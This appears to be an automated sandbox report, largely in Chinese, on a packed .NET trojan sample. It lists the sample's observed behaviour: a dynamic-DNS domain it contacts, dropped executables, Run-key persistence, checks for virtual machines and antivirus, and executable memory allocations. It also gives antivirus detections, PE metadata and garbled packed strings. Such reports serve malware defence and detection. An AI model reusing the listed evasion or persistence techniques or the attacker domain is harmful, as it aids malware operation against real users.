CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545402.84375
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90824712
registers.ebx: 40148980
registers.esp: 90824712
registers.ebp: 90824744
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545404.39075
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90824536
registers.ebp: 90824568
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545404.40675
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90824536
registers.ebx: 40148980
registers.esp: 90824536
registers.ebp: 90824568
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
行为判定
动态指标
连接到动态 DNS 域 (1 个事件)
domain rwkeith.no-ip.org
分配可读-可写-可执行内存(通常用于自解压) (50 out of 60 个事件)
Time & API Arguments Status Return Repeated
1727545330.500875
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6fc91000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.531875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x002da000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.531875
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6fc92000
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.531875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x002d2000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.593875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003e2000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.625875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003e3000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.625875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0041b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.625875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00417000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.625875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003ec000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.718875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00740000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.750875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003e4000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.750875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003f6000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.765875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003ea000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.796875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0040a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.796875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00402000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.812875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00415000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.921875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x002db000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.937875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003fa000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545330.937875
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x003f7000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2336
success 0 0
1727545332.71875
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6f6e1000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.75075
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0045a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.75075
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6f6e2000
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.75075
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00452000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.78175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00462000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.79675
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00463000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.79675
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0049b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.79675
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00497000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.81275
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0046c000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.85975
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00840000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.85975
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0048a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.87575
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00482000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.87575
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00464000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545332.87575
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00495000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545333.03175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00465000
region_size: 8192
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545333.03175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00467000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545333.03175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0047a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545333.03175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00477000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545333.06275
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0045b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545335.10975
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x02170000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545335.10975
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00476000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545339.15675
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0046a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545339.20375
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00468000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545339.28175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x02171000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545339.34375
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00453000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545339.35975
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x02172000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545342.12575
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0047b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545342.53175
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x02173000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545343.09375
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00841000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545343.09375
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x7ef20000
region_size: 327680
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
1727545343.09375
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x7ef20000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1600
success 0 0
在文件系统上创建可执行文件 (2 个事件)
file C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe
file C:\Users\Administrator\AppData\Local\Temp\0pg4tybc.0.vb
投放一个二进制文件并执行它 (1 个事件)
file C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe
将可执行文件投放到用户的 AppData 文件夹 (2 个事件)
file C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe
file C:\Users\Administrator\AppData\Local\Temp\0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe
一个进程创建了一个隐藏窗口 (1 个事件)
Time & API Arguments Status Return Repeated
1727545332.515875
ShellExecuteExW
filepath: C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe
filepath_r: C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe
parameters: C:\Users\Administrator\AppData\Local\Temp\0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe
show_type: 0
success 1 0
检查适配器地址以检测虚拟网络接口 (10 个事件)
Time & API Arguments Status Return Repeated
1727545339.40675
GetAdaptersAddresses
family: 0
flags: 15
failed 111 0
1727545339.40675
GetAdaptersAddresses
family: 0
flags: 15
success 0 0
1727545339.43775
GetAdaptersAddresses
family: 0
flags: 640
failed 111 0
1727545339.43775
GetAdaptersAddresses
family: 0
flags: 640
success 0 0
1727545339.46875
GetAdaptersAddresses
family: 0
flags: 0
failed 111 0
1727545339.46875
GetAdaptersAddresses
family: 0
flags: 0
success 0 0
1727545342.07875
GetAdaptersAddresses
family: 0
flags: 1158
success 0 0
1727545342.10975
GetAdaptersAddresses
family: 0
flags: 1158
success 0 0
1727545342.53175
GetAdaptersAddresses
family: 0
flags: 46
failed 111 0
1727545342.54675
GetAdaptersAddresses
family: 0
flags: 46
success 0 0
该二进制文件可能包含加密或压缩数据,表明使用了打包工具 (2 个事件)
section {'name': '.text', 'virtual_address': '0x00002000', 'virtual_size': '0x000130e4', 'size_of_data': '0x00013200', 'entropy': 7.478297098506251} entropy 7.478297098506251 description 发现高熵的节
entropy 0.9807692307692307 description 此PE文件的整体熵值较高
检查系统上可疑权限的本地唯一标识符 (2 个事件)
Time & API Arguments Status Return Repeated
1727545330.781875
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1727545339.15675
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
终止另一个进程 (1 个事件)
Time & API Arguments Status Return Repeated
1727545332.515875
NtTerminateProcess
process_handle: 0x000002fc
status_code: 0xffffffff
process_identifier: 2336
failed 0 0
网络通信
与未执行 DNS 查询的主机进行通信 (1 个事件)
host 114.114.114.114
Attempts to identify installed AV products by registry key (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mscorsvc
在 Windows 启动时自我安装以实现自动运行 (1 个事件)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mscorsvc reg_value "C:\Users\Administrator\AppData\Local\Temp\sortkey.exe"
执行一个或多个 WMI 查询 (2 个事件)
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM FirewallProduct
连接到不再响应请求的 IP 地址(合法服务通常会保持运行) (1 个事件)
dead_host 44.221.84.105:80
文件已被 VirusTotal 上 50 个反病毒引擎识别为恶意 (50 个事件)
ALYac Gen:Variant.UrsuMDTac.662
APEX Malicious
AVG Win32:Agent-AVLJ [Trj]
Acronis suspicious
Ad-Aware Gen:Variant.UrsuMDTac.662
Antiy-AVL Trojan/Win32.AGeneric
Arcabit Trojan.UrsuMDTac.662
Avast Win32:Agent-AVLJ [Trj]
Avira TR/Dropper.Gen
BitDefender Gen:Variant.UrsuMDTac.662
BitDefenderTheta Gen:NN.ZemsilF.34132.em0@aWX6Hji
ClamAV Win.Trojan.Mintluks-6444821-0
Comodo TrojWare.MSIL.Mintluks.JJC@7axq6t
CrowdStrike win/malicious_confidence_100% (D)
Cybereason malicious.b0ebbe
Cylance Unsafe
Cynet Malicious (score: 100)
Cyren W32/MSIL_Kryptik.AZD.gen!Eldorado
DrWeb Trojan.DownLoader7.54184
ESET-NOD32 a variant of MSIL/Kryptik.MSS
Emsisoft Gen:Variant.UrsuMDTac.662 (B)
F-Prot W32/MSIL_Kryptik.AZD.gen!Eldorado
F-Secure Trojan.TR/Dropper.Gen
FireEye Generic.mg.c03ac1db0ebbe03a
Fortinet MSIL/Kryptik.JJC!tr
GData Gen:Variant.UrsuMDTac.662
Ikarus Trojan-Dropper.MSIL
Invincea heuristic
Jiangmin TrojanDropper.Injector.ioj
K7AntiVirus Trojan ( 00534cf21 )
K7GW Trojan ( 00534cf21 )
Kaspersky HEUR:Trojan.Win32.Generic
MAX malware (ai score=88)
Malwarebytes Trojan.Crypt
McAfee GenericRXDE-PH!C03AC1DB0EBB
MicroWorld-eScan Gen:Variant.UrsuMDTac.662
Microsoft PWS:MSIL/Mintluks.B
NANO-Antivirus Trojan.Win32.Generic.euparm
Panda Trj/GdSda.A
Qihoo-360 HEUR/QVM03.0.76F6.Malware.Gen
Rising Trojan.Mintluks!1.AE81 (CLASSIC)
Sangfor Malware
SentinelOne DFI - Malicious PE
Sophos Mal/MSIL-TU
Trapmine malicious.moderate.ml.score
TrendMicro TROJ_MINTLUKS.SM
TrendMicro-HouseCall TROJ_MINTLUKS.SM
VBA32 Trojan.Downloader
ZoneAlarm HEUR:Trojan.Win32.Generic
eGambit Unsafe.AI_Score_99%
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-07-10 13:59:44

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000130e4 0x00013200 7.478297098506251
.rsrc 0x00016000 0x000002b0 0x00000400 2.218684755624737
.reloc 0x00018000 0x0000000c 0x00000200 0.10191042566270775

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00016058 0x00000254 LANG_NEUTRAL SUBLANG_NEUTRAL None

Imports

Library mscoree.dll:
0x402000 _CorExeMain

L!This program cannot be run in DOS mode.
`.rsrc
@.reloc
?Xkl(N
?Xkl(N
&-;DNXl5
?Xkl(N
?Xkl(N
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
I%&/m{
iG#)*eVe]f
{{;N'?\fd
!?~|?"?
7]~]_?
M:[ltz
_cG=~_
5_5~=7~'
(mk_k5'~sK?"
@?KoS.
vM~#}}
o~C|77`B
Mj[:2p-FmG
5K~__~{o
0Kb.!]~#o
w6AI+b
{|[O:
l?a_Sm^o[6o]}kX9o6k
y-~q_87e{
L{is/~o!MHk;c@o--
7|B|cM|~
@m=?'*{;
h'y"Xa
Jk1w/i
.\Fo$Xos
}:ml+>wg{
{)s~7O
P-aaoit{
o.p~m]
Oo~_77&"n1{?
~7;6[4
?o:xwZ
oc~mzA
h_o@:hDo
4>/<z5
jBS.k-T
2z!SkP
DR|[_
q|@u8/k;sWsI
u_[z!g{R
#i>7f|cn_
"oSuI~_cs
okI87-~mi
X8-w~_
~){)Gi_
okiQ>?G
0|?7+z
-w~_7$n-`o
WhK_c(
)8`{[7}w
.i/ooC_L
~f^abu"Q#
iui~_m~_
_cLV?$
o+:cm
d&EfzH
F m?PJ#yzw
b_4uxP
AcY_kA5\
5~eK,:
7~7F<bm(b[
f{kt%bK#g
~M75~Jd
T0oW?_ZIZ
* W?Clo
'O@+z}5_?F
~v]}[Zk
oAoc6<
/5Ozo_/
`'O_^]y_%O2_
y/?8b*p0m.?O
gn\4g}
.~P'6c9
6H|OD5
d;9t~?Mo
;_o-me~
#!?MvKES
HR,GA$j
}M&y5
O6'w~_
7!K/z(
0vJ154FB-
foPGH;[?jFoJ6
o[|7-~
WeSU~k[@X6og
sZF~CPE
.oc(.Q]~6;
o;35.F[]myW
Vg-5~?~
}v_Jsz
8A3[{k
woc;+[o:dZta~=6ky
%M_G?C*7 >e
}"4G'\RB)?;F
vfA33}
~'26oO
}f?|qm~|IOg
~a=o!$/o4~
o5kpk
~|mmomcU$
|[[h]=m5 b
<_o/WM%?
=o/O~?~-roZ__
~W|;KK/C
!_J/C?
|;K+/C
C;!w_o
Nv]'!woor
v]]!wow
3ma57_7
22Cooy
{vhW&vho
AAG?`C
oY Zo@
Oo@+v(
6d(n{8,
*m>y@*4
E~?H_V
k54H__
k[o__+-
o~u]_HW
6."[|5
__x7~w
`~__lh~~H?
oT+7=P
3A!K~O@
ok>w`t;^/
mqJ~I;
6[%~h_'
k1s LG
~=sKf<WkG
G_X%oo
o[3}[zo
oo"7~_
o[z?L=o
o32mzo6
